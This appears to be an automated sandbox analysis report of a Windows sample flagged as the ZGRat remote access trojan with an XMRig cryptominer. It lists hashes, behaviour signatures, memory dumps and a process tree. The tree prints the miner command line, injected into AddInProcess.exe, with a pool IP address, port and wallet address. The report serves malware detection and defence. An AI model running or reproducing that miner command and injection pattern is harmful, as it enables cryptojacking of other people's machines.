Overview

overview

10

Static

static

3

noncrypted...ub.exe

windows7-x64

10

noncrypted...ub.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-04-2024 05:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    noncryptedmainstub.exe

  • Size

    632KB

  • MD5

    9eab8c5d7b1f4659a787cc77d571f03b

  • SHA1

    27ce5d456d44b2d0ce994b14b11e8c5ffeabf385

  • SHA256

    1254ede011ea7c8ba1658bab1c14877d1a2dc85f8b4e2d04be6c5fc65f1c32b8

  • SHA512

    1fcfa030dac1c6fb573c614c1564e663086b518fa376ce3bbf90da6b1ecc8d065f91c90d6f6efea23c27efce720b90847869d0eef84ce4939fb1f43d7d0eafd9

  • SSDEEP

    12288:waOcj6gjLcJD/VF3AlAp2jLre/i6g578+3NruqK1lMdMD6QVCh5Iy5C:wuHj4JzQlq2j2/iJ78KNzK1lMCGGCR

Score
10/10
xmrigzgratminerrat

Malware Config

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 12 IoCs
    miner
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\noncryptedmainstub.exe
    "C:\Users\Admin\AppData\Local\Temp\noncryptedmainstub.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1728

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1728-18-0x00000236D3710000-0x00000236D3730000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1728-22-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-12-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-13-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-25-0x00000236D3740000-0x00000236D3760000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1728-24-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-23-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-16-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-8-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-9-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-10-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-11-0x00000236D36C0000-0x00000236D36E0000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1728-14-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-26-0x00000236D3740000-0x00000236D3760000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1728-17-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/1728-15-0x0000000140000000-0x00000001407CF000-memory.dmp
    Filesize

    7.8MB

    Download
  • memory/3468-7-0x000001D5D3880000-0x000001D5D3890000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3468-21-0x000001D5D3880000-0x000001D5D3890000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3468-0-0x000001D5B9190000-0x000001D5B9232000-memory.dmp
    Filesize

    648KB

    Download
  • memory/3468-19-0x00007FFECA640000-0x00007FFECB101000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3468-20-0x000001D5D3880000-0x000001D5D3890000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3468-2-0x00007FFECA640000-0x00007FFECB101000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3468-1-0x000001D5D3750000-0x000001D5D3852000-memory.dmp
    Filesize

    1.0MB

    Download
  • memory/3468-6-0x000001D5D3880000-0x000001D5D3890000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3468-5-0x000001D5BAFA0000-0x000001D5BAFEC000-memory.dmp
    Filesize

    304KB

    Download
  • memory/3468-4-0x000001D5B95E0000-0x000001D5B9636000-memory.dmp
    Filesize

    344KB

    Download
  • memory/3468-3-0x000001D5D3880000-0x000001D5D3890000-memory.dmp
    Filesize

    64KB

    Download